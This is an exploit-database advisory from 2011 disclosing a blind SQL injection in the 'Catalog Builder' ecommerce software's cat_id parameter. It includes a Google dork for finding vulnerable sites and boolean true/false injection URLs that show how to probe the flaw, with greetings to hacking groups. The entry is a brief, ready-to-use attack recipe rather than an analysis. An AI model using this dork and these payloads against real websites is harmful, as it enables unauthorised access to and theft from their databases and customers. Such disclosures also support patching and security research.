Catalog Builder - Ecommerce Software - Blind SQL Injection
| EKU-ID: 544 | CVE: | OSVDB-ID: |
| Author: takeshix | Published: 2011-06-17 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 544 | CVE: | OSVDB-ID: |
| Author: takeshix | Published: 2011-06-17 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
+------------------------------------------------------------------------------------------+
|-------[ Catalog Builder - Ecommerce Software - Blind SQL Injection Vulnerability ]-------|
+------------------------------------------------------------------------------------------+
[+] Google Dork hint: inurl:'/catalog/main.php?cat_id='
[+] Date: 16.06.2011
[+] Author: takeshix
[+] Author Contact: takeshix.query@googlemail.com<SCRIPT type=text/javascript>
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</SCRIPT>
[+] Software Link: http://www.catalogbuilder.ca/catalog/main.php
[+] Tested on: Fedora
[+] Platform: PHP
--------------------------------------------------------------------------------------------
vulnerable url:
/catalog/main.php?cat_id=[blind sqli]
example:
http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshix true
http://localhost/catalog/main.php?cat_id=1' AND 1337=1337 AND 'takeshix'='takeshixx false
--------------------------------------------------------------------------------------------
[+] Greez to some members of UNITS & hackademics & DSU
+------------------------------------------------------------------------------------------+
|-------------------------------------[ hacktivistas ]-------------------------------------|
+------------------------------------------------------------------------------------------+